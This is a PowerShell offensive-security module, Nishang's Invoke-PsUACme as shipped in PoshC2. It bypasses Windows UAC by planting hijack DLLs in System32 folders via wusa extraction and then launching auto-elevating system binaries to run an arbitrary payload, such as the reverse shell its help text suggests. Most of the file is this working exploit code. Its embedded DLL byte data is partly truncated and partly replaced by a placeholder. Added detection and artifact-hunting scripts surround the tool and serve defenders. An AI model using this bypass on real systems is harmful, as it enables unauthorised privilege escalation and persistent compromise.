PoshC2_Python/Modules/Invoke-PsUACme.ps1

418 lines
50 KiB
PowerShell
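
Seen from the detection side, the help text of the script below describes two process-creation traces: a wusa.exe call that uses the extract option to write into a Windows directory, and a later elevated process that runs the batch file at the default PayloadPath. The following is an added example, not part of the Nishang/PoshC2 code; it assumes Sysmon-style process-creation fields (Image, CommandLine, IntegrityLevel, ParentImage), and the function name `Find-WusaUacBypassTrace`, the host name and all sample events are constructed.

```powershell
# Added example (not from the script): flags the process-creation traces that
# the script's help text describes. Field names follow Sysmon Event ID 1; the
# function name and every sample event below are constructed for illustration.
function Find-WusaUacBypassTrace {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory = $true, ValueFromPipeline = $true)]
        [psobject] $ProcessEvent,

        # Default PayloadPath taken from the script's parameter block.
        [string] $PayloadPath = 'C:\Windows\temp\cmd.bat',

        [string] $SystemRoot = 'C:\Windows'
    )
    begin {
        $payloadPattern  = [regex]::Escape($PayloadPath)
        # Destination may be quoted (with spaces) or unquoted.
        $extractPattern  = '/extract:(?:"(?<dest>[^"]+)"|(?<dest>\S+))'
        $protectedPrefix = $SystemRoot.TrimEnd('\') + '\*'
    }
    process {
        # Trace 1: wusa.exe unpacking a file into a Windows-owned directory.
        if ($ProcessEvent.Image -like '*\wusa.exe' -and
            $ProcessEvent.CommandLine -match $extractPattern) {
            $dest = $Matches['dest']
            if ($dest -like $protectedPrefix) {
                [pscustomobject]@{
                    UtcTime  = $ProcessEvent.UtcTime
                    Computer = $ProcessEvent.Computer
                    Rule     = 'WusaExtractIntoSystemRoot'
                    Image    = $ProcessEvent.Image
                    Detail   = "extract destination: $dest"
                }
            }
        }

        # Trace 2: an elevated process whose command line runs the batch file
        # at PayloadPath (-match is case-insensitive, so Temp/temp both hit).
        if ($ProcessEvent.IntegrityLevel -in @('High', 'System') -and
            $ProcessEvent.CommandLine -match $payloadPattern) {
            [pscustomobject]@{
                UtcTime  = $ProcessEvent.UtcTime
                Computer = $ProcessEvent.Computer
                Rule     = 'ElevatedTempBatch'
                Image    = $ProcessEvent.Image
                Detail   = "parent: $($ProcessEvent.ParentImage)"
            }
        }
    }
}

# Constructed sample events: two suspicious, two benign.
$sampleEvents = @(
    [pscustomobject]@{
        UtcTime = '2024-01-10 09:14:02'; Computer = 'WS-017'; IntegrityLevel = 'Medium'
        Image = 'C:\Windows\System32\wusa.exe'
        CommandLine = 'wusa.exe C:\Users\alice\AppData\Local\Temp\sample.tmp /extract:C:\Windows\System32\SampleDir\'
        ParentImage = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
    }
    [pscustomobject]@{
        UtcTime = '2024-01-10 09:14:09'; Computer = 'WS-017'; IntegrityLevel = 'High'
        Image = 'C:\Windows\System32\cmd.exe'
        CommandLine = 'C:\Windows\System32\cmd.exe /c C:\Windows\Temp\cmd.bat'
        ParentImage = 'C:\Windows\System32\sysprep\sysprep.exe'
    }
    [pscustomobject]@{
        # Benign: ordinary update installation, no extract option.
        UtcTime = '2024-01-10 10:02:41'; Computer = 'WS-017'; IntegrityLevel = 'High'
        Image = 'C:\Windows\System32\wusa.exe'
        CommandLine = 'wusa.exe C:\Updates\sample-update.msu /quiet /norestart'
        ParentImage = 'C:\Windows\explorer.exe'
    }
    [pscustomobject]@{
        # Benign: medium-integrity batch file outside the Windows directory.
        UtcTime = '2024-01-10 10:15:30'; Computer = 'WS-017'; IntegrityLevel = 'Medium'
        Image = 'C:\Windows\System32\cmd.exe'
        CommandLine = 'cmd.exe /c C:\Users\alice\build.bat'
        ParentImage = 'C:\Windows\explorer.exe'
    }
)

$sampleEvents | Find-WusaUacBypassTrace | Format-Table -AutoSize
```

Because the script's own cleanup leaves the dropped DLLs in place, file-creation events for new DLLs under the Windows directory are a useful companion signal to these two rules.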

function Invoke-PsUACme
{
<#
.SYNOPSIS
Nishang script which uses known methods to bypass UAC.
.DESCRIPTION
This script implements methods from UACME project (https://github.com/hfiref0x/UACME) to bypass UAC on Windows machines.
It drops DLLs in the known misconfigured/vulnerable locations of Windows machines using Wusa.exe and executes built-in executables
to bypass UAC. The following methods (named mostly on the basis of the executables used) are implemented: "sysprep","oobe","ActionQueue",
"migwiz","cliconfg","winsat" and "mmc"
The DLLs dropped by the script are a modified version of Fubuki from the UACME project. Separate DLLs are needed for 64 bit and 32 bit machines.
The script determines the bit-ness of the process from which it is called and uses the appropriate DLL.
The script drops cmd.bat in the C:\Windows\Temp directory and it is this batch file which is called from the DLL. Everything provided
to the Payload parameter ends up in this batch file.
Wusa.exe on Windows 10 has no "extract" option. Therefore, Invoke-PsUACme does not currently work on Windows 10.
A clean up is done by the script after payload execution. But the DLLs dropped in secure locations must be removed manually.
The script must be run from a process running with medium integrity.
.PARAMETER Payload
Payload to be executed from the elevated process. The default one checks if the elevation was successful.
.PARAMETER method
The method to be used for elevation. The default one is sysprep.
.PARAMETER PayloadPath
The path to the payload. The default one is C:\Windows\temp\cmd.bat. To change this, change the path in DLL as well.
.PARAMETER CustomDLL64
Path to a custom 64 bit DLL.
.PARAMETER CustomDLL32
Path to a custom 32 bit DLL.
.PARAMETER $DllBytes64
Default 64 bit DLL hard coded in the script. It is slightly modified Fubuki DLL from the UACME project.
.PARAMETER $DllBytes32
Default 32 bit DLL hard coded in the script. It is slightly modified Fubuki DLL from the UACME project.
.EXAMPLE
PS > Invoke-PsUACme -Verbose
Above command runs the sysprep method and the default payload.
.EXAMPLE
PS > Invoke-PsUACme -method oobe -Verbose
Above command runs the oobe method and the default payload.
.EXAMPLE
PS > Invoke-PsUACme -method oobe -Payload "powershell -windowstyle hidden -e <Base64EncodedCommand>"
Above command runs the oobe method and the specified payload. The payload in this case is the one liner PowerShell reverse shell
(Shells directory of Nishang) which is base64 encoded using the Invoke-Encode (with the -OutCommand parameter) script from the
Utility directory of Nishang.
The reverse shell in above case runs with elevated privileges.
.LINK
http://www.labofapenetrationtester.com/2015/09/bypassing-uac-with-powershell.html
https://github.com/samratashok/nishang
#>
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $False)]
[String]
$Payload = 'powershell.exe -noexit -c "if ([bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match ''S-1-5-32-544'')) {Write-Output ''You have elevated/Administrator rights!''}"',
[Parameter(Position = 1, Mandatory = $False)]
[ValidateSet("sysprep","oobe","ActionQueue","migwiz","cliconfg","winsat","mmc")]
[String]
$method = "sysprep",
[Parameter(Position = 2, Mandatory = $False)]
[String]
$PayloadPath = "C:\Windows\temp\cmd.bat",
[Parameter(Position = 3, Mandatory = $False)]
[String]
$CustomDll64,
[Parameter(Position = 4, Mandatory = $False)]
[String]
$CustomDll32,
[Parameter(Position = 5, Mandatory = $False)]
[String]
$DllBytes64 = "<embedded 64-bit DLL byte values omitted>",
[Parameter(Position = 6, Mandatory = $False)]
[String]
$DllBytes32 = "
117 114 110 58 115 99 104 101 109 97 115 45 109 105 99 114 111 115 111 102 116 45 99 111 109 58 97 115 109 46 118 51 34 62 13 10 32 32 32 32 60 115 101 99 117 114 105 116 121 62 13 10 32 32 32 32 32 32 60 114 101 113 117 101 115 116 101 100 80 114 105 118 105 108 101 103 101 115 62 13 10 32 32 32 32 32 32 32 32 60 114 101 113 117 101 115 116 101 100 69 120 101 99 117 116 105 111 110 76 101 118 101 108 32 108 101 118 101 108 61 39 97 115 73 110 118 111 107 101 114 39 32 117 105 65 99 99 101 115 115 61 39 102 97 108 115 101 39 32 47 62 13 10 32 32 32 32 32 32 60 47 114 101 113 117 101 115 116 101 100 80 114 105 118 105 108 101 103 101 115 62 13 10 32 32 32 32 60 47 115 101 99 117 114 105 116 121 62 13 10 32 32 60 47 116 114 117 115 116 73 110 102 111 62 13 10 60 47 97 115 115 101 109 98 108 121 62 13 10 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 16 0 0 60 0 0 0 22 48 41 48 65 48 77 48 103 48 110 48 132 48 147 48 152 48 202 48 226 48 241 48 1 49 8 49 17 49 22 49 33 49 70 49 76 49 134 49 171 49 177 49 39 50 98 50 111 50 125 50 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
)
    # A custom DLL supplied by the caller replaces the matching embedded default.
    if ($CustomDll64)
    {
        Write-Output "Reading 64 bit DLL."
        [byte[]]$bytes = [System.IO.File]::ReadAllBytes($CustomDll64)
        $DllBytes64 = $bytes -join ' '
    }
    elseif ($CustomDll32)
    {
        Write-Output "Reading 32 bit DLL."
        [byte[]]$bytes = [System.IO.File]::ReadAllBytes($CustomDll32)
        $DllBytes32 = $bytes -join ' '
    }

    # Pick the DLL that matches the bitness of the current process.
    if (([IntPtr]::Size) -eq 8)
    {
        Write-Output "64 bit process detected."
        $DllBytes = $DllBytes64
    }
    elseif (([IntPtr]::Size) -eq 4)
    {
        Write-Output "32 bit process detected."
        $DllBytes = $DllBytes32
    }

    # Write the payload to the batch file that the dropped DLL launches.
    Out-File -FilePath $PayloadPath -InputObject $Payload -Encoding ascii

    # The build number is matched as a substring below ("76", "96", "10").
    $OSVersion = (Get-WmiObject -Class win32_OperatingSystem).BuildNumber
    switch($method)
    {
        "Sysprep"
        {
            Write-Output "Using Sysprep method"
            if ($OSVersion -match "76")
            {
                Write-Output "Windows 7 found!"
                $dllname = "CRYPTBASE.dll"
                $PathToDll = "$env:temp\$dllname"
                Write-Output "Writing to $PathToDll"
                [Byte[]] $temp = $DllBytes -split ' '
                [System.IO.File]::WriteAllBytes($PathToDll, $temp)
            }
            if ($OSVersion -match "96")
            {
                Write-Output "Windows 8 found!"
                $dllname = "shcore.dll"
                $PathToDll = "$env:temp\$dllname"
                Write-Output "Writing to $PathToDll"
                [Byte[]] $temp = $DllBytes -split ' '
                [System.IO.File]::WriteAllBytes($PathToDll, $temp)
            }
            if ($OSVersion -match "10")
            {
                Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
            }
            $Target = "$env:temp\uac.cab"
            $wusapath = "C:\Windows\System32\Sysprep\"
            $execpath = "C:\Windows\System32\Sysprep\sysprep.exe"
            Write-Output "Creating cab $Target"
            $null = & makecab $PathToDll $Target
            Write-Output "Extracting cab to $wusapath "
            $null = & wusa $Target /extract:$wusapath
            Start-Sleep -Seconds 1
            Write-Output "Executing $execpath "
            & $execpath
        }
        "OOBE"
        {
            Write-Output "Using OOBE method"
            Write-Output "Writing DLLs to Temp directory"
            if ($OSVersion -match "76")
            {
                Write-Output "Windows 7 found!"
                $dllname = "wdscore.dll"
                $PathToDll = "$env:temp\$dllname"
                Write-Output "Writing to $PathToDll"
                [Byte[]] $temp = $DllBytes -split ' '
                [System.IO.File]::WriteAllBytes($PathToDll, $temp)
            }
            if ($OSVersion -match "96")
            {
                Write-Output "Windows 8 found!"
                $dllname = "wdscore.dll"
                $PathToDll = "$env:temp\$dllname"
                Write-Output "Writing to $PathToDll"
                [Byte[]] $temp = $DllBytes -split ' '
                [System.IO.File]::WriteAllBytes($PathToDll, $temp)
            }
            if ($OSVersion -match "10")
            {
                Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
            }
            $Target = "$env:temp\uac.cab"
            $wusapath = "C:\Windows\System32\oobe\"
            $execpath = "C:\Windows\System32\oobe\setupsqm.exe"
            Write-Output "Creating cab $Target"
            $null = & makecab $PathToDll $Target
            Write-Output "Extracting cab to $wusapath "
            $null = & wusa $Target /extract:$wusapath
            Start-Sleep -Seconds 1
            Write-Output "Executing $execpath "
            & $execpath
        }
        "ActionQueue"
        {
            Write-Output "Using Sysprep Actionqueue method"
            if ($OSVersion -match "76")
            {
                Write-Output "Windows 7 found!"
                $dllname = "ActionQueue.dll"
                $PathToDll = "$env:temp\$dllname"
                Write-Output "Writing to $PathToDll"
                [Byte[]] $temp = $DllBytes -split ' '
                [System.IO.File]::WriteAllBytes($PathToDll, $temp)
            }
            if ($OSVersion -match "96")
            {
                Write-Warning "This method doesn't work on Windows 8.1 onwards."
            }
            if ($OSVersion -match "10")
            {
                Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
            }
            $Target = "$env:temp\uac.cab"
            $wusapath = "C:\Windows\System32\Sysprep\"
            $execpath = "C:\Windows\System32\Sysprep\sysprep.exe"
            Write-Output "Creating cab $Target"
            $null = & makecab $PathToDll $Target
            Write-Output "Extracting cab to $wusapath "
            $null = & wusa $Target /extract:$wusapath
            Start-Sleep -Seconds 1
            Write-Output "Executing $execpath "
            & $execpath
        }
        "migwiz"
        {
            Write-Output "Using migwiz method"
            if ($OSVersion -match "76")
            {
                Write-Output "Windows 7 found!"
                $dllname = "wdscore.dll"
                $PathToDll = "$env:temp\$dllname"
                Write-Output "Writing to $PathToDll"
                [Byte[]] $temp = $DllBytes -split ' '
                [System.IO.File]::WriteAllBytes($PathToDll, $temp)
            }
            if ($OSVersion -match "96")
            {
                Write-Output "Windows 8 found!"
                $dllname = "wdscore.dll"
                $PathToDll = "$env:temp\$dllname"
                Write-Output "Writing to $PathToDll"
                [Byte[]] $temp = $DllBytes -split ' '
                [System.IO.File]::WriteAllBytes($PathToDll, $temp)
            }
            if ($OSVersion -match "10")
            {
                Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
            }
            $Target = "$env:temp\uac.cab"
            $wusapath = "C:\Windows\System32\migwiz\"
            $execpath = "C:\Windows\System32\migwiz\migwiz.exe"
            Write-Output "Creating cab $Target"
            $null = & makecab $PathToDll $Target
            Write-Output "Extracting cab to $wusapath "
            $null = & wusa $Target /extract:$wusapath
            Start-Sleep -Seconds 1
            Write-Output "Executing $execpath "
            & $execpath
        }
        "cliconfg"
        {
            Write-Output "Using cliconfg method"
            if ($OSVersion -match "76")
            {
                Write-Output "Windows 7 found!"
                $dllname = "ntwdblib.dll"
                $PathToDll = "$env:temp\$dllname"
                Write-Output "Writing to $PathToDll"
                [Byte[]] $temp = $DllBytes -split ' '
                [System.IO.File]::WriteAllBytes($PathToDll, $temp)
            }
            if ($OSVersion -match "96")
            {
                Write-Output "Windows 8 found!"
                $dllname = "ntwdblib.dll"
                $PathToDll = "$env:temp\$dllname"
                Write-Output "Writing to $PathToDll"
                [Byte[]] $temp = $DllBytes -split ' '
                [System.IO.File]::WriteAllBytes($PathToDll, $temp)
            }
            if ($OSVersion -match "10")
            {
                Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
            }
            $Target = "$env:temp\uac.cab"
            $wusapath = "C:\Windows\System32\"
            $execpath = "C:\Windows\System32\cliconfg.exe"
            Write-Output "Creating cab $Target"
            $null = & makecab $PathToDll $Target
            Write-Output "Extracting cab to $wusapath "
            $null = & wusa $Target /extract:$wusapath
            Start-Sleep -Seconds 1
            Write-Output "Executing $execpath "
            & $execpath
        }
        "winsat"
        {
            Write-Output "Using winsat method"
            if ($OSVersion -match "76")
            {
                Write-Output "Windows 7 found!"
                $dllname = "ntwdblib.dll"
                $PathToDll = "$env:temp\$dllname"
                Write-Output "Writing to $PathToDll"
                [Byte[]] $temp = $DllBytes -split ' '
                [System.IO.File]::WriteAllBytes($PathToDll, $temp)
            }
            if ($OSVersion -match "96")
            {
                Write-Output "Windows 8 found!"
                $dllname = "devobj.dll"
                $PathToDll = "$env:temp\$dllname"
                Write-Output "Writing to $PathToDll"
                [Byte[]] $temp = $DllBytes -split ' '
                [System.IO.File]::WriteAllBytes($PathToDll, $temp)
            }
            if ($OSVersion -match "10")
            {
                Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
            }
            $Target = "$env:temp\uac.cab"
            $wusapath = "C:\Windows\System32\sysprep\"
            $execpath = "C:\Windows\System32\sysprep\winsat.exe"
            $Targetwinsat = "$env:temp\uac_winsat.cab"
            Write-Output "Copying C:\Windows\System32\winsat.exe to $env:temp"
            Copy-Item "C:\Windows\System32\winsat.exe" "$env:temp\winsat.exe"
            Write-Output "Creating cab $Targetwinsat"
            $null = & makecab "$env:temp\winsat.exe" $Targetwinsat
            Write-Output "Extracting cab to $wusapath "
            $null = & wusa $Targetwinsat /extract:$wusapath
            Write-Output "Creating cab $Target"
            $null = & makecab $PathToDll $Target
            Write-Output "Extracting cab to $wusapath "
            $null = & wusa $Target /extract:$wusapath
            Start-Sleep -Seconds 1
            Write-Output "Executing $execpath "
            & $execpath
        }
        "mmc"
        {
            Write-Output "Using mmc method"
            if ($OSVersion -match "76")
            {
                Write-Output "Windows 7 found!"
                $dllname = "ntwdblib.dll"
                $PathToDll = "$env:temp\$dllname"
                Write-Output "Writing to $PathToDll"
                [Byte[]] $temp = $DllBytes -split ' '
                [System.IO.File]::WriteAllBytes($PathToDll, $temp)
            }
            if ($OSVersion -match "96")
            {
                Write-Output "Windows 8 found!"
                $dllname = "elsext.dll"
                $PathToDll = "$env:temp\$dllname"
                Write-Output "Writing to $PathToDll"
                [Byte[]] $temp = $DllBytes -split ' '
                [System.IO.File]::WriteAllBytes($PathToDll, $temp)
            }
            if ($OSVersion -match "10")
            {
                Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
            }
            $Target = "$env:temp\uac.cab"
            $wusapath = "C:\Windows\System32\"
            $execpath = "C:\Windows\System32\mmc.exe eventvwr.msc"
            Write-Output "Creating cab $Target"
            $null = & makecab $PathToDll $Target
            Write-Output "Extracting cab to $wusapath "
            $null = & wusa $Target /extract:$wusapath
            Start-Sleep -Seconds 1
            Write-Output "Executing $execpath "
            & $execpath
        }
    }
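    #Clean up
    # Only the temp copies are removed here. The winsat method's uac_winsat.cab and
    # winsat.exe copy in $env:temp are not removed by this block either.
    Write-Output "Removing $Target."
    Remove-Item -Path $Target
    Write-Output "Removing $PathToDll."
    Remove-Item -Path $PathToDll
    Write-Output "$wusapath$dllname must be removed manually."
    Write-Output "$PayloadPath must be removed manually."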
}
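
The clean-up above leaves the dropped DLL and the payload file on disk, which is what an incident responder can look for. The following is an added example, not part of Invoke-PsUACme, Nishang or PoshC2: it reports files at the drop locations used by the switch cases above and flags any that carry the version-resource strings of the default embedded DLL. The function name Find-PsUACmeArtifact, the default payload path under the Windows Temp directory, and the default per-user Temp layout are assumptions.

```powershell
# Added example, not part of Invoke-PsUACme: report files the script above can leave behind.
function Find-PsUACmeArtifact
{
    $sys32 = Join-Path $env:windir 'System32'
    # Drop directory -> file names, taken from the switch($method) cases above.
    $drops = @(
        @{ Dir = "$sys32\Sysprep"; Names = 'CRYPTBASE.dll','shcore.dll','ActionQueue.dll','ntwdblib.dll','devobj.dll','winsat.exe' },
        @{ Dir = "$sys32\oobe";    Names = 'wdscore.dll' },
        @{ Dir = "$sys32\migwiz";  Names = 'wdscore.dll' },
        @{ Dir = $sys32;           Names = 'ntwdblib.dll','elsext.dll' }
    )
    # Version-resource strings of the default embedded DLL (a custom DLL will not carry them).
    $markers = 'Fubuki.dll','UACMe','UG North'

    foreach ($drop in $drops)
    {
        foreach ($name in $drop.Names)
        {
            $path = Join-Path $drop.Dir $name
            if (-not (Test-Path -LiteralPath $path -PathType Leaf)) { continue }
            $item = Get-Item -LiteralPath $path -Force
            $info = $item.VersionInfo
            $hits = @($info.OriginalFilename, $info.ProductName, $info.CompanyName |
                      Where-Object { $markers -contains $_ })
            New-Object PSObject -Property @{
                Path         = $path
                Kind         = 'Dropped file candidate'
                CreatedUtc   = $item.CreationTimeUtc
                Company      = $info.CompanyName
                FubukiMarker = ($hits.Count -gt 0)
            }
        }
    }

    # Payload and staging files: cmd.bat and the winsat copies are never deleted by the
    # clean-up; uac.cab remains only after an interrupted run. Assumes default profile paths.
    $leftovers = @("$env:windir\Temp\cmd.bat") +
                 @('uac.cab','uac_winsat.cab','winsat.exe' |
                   ForEach-Object { "$env:SystemDrive\Users\*\AppData\Local\Temp\$_" })
    Get-ChildItem -Path $leftovers -Force -ErrorAction SilentlyContinue | ForEach-Object {
        New-Object PSObject -Property @{
            Path = $_.FullName; Kind = 'Staging or payload file'; CreatedUtc = $_.CreationTimeUtc
            Company = $_.VersionInfo.CompanyName; FubukiMarker = $false
        }
    }
}

Find-PsUACmeArtifact | Sort-Object CreatedUtc | Format-Table Path, Kind, CreatedUtc, Company, FubukiMarker -AutoSize
```

Run it from a 64-bit PowerShell on 64-bit Windows, because a 32-bit process has System32 redirected to SysWOW64 and would inspect the wrong directories. Files directly under System32 with these names can be legitimate, so treat a row without FubukiMarker as something to review by company name and creation time, not as a confirmed finding.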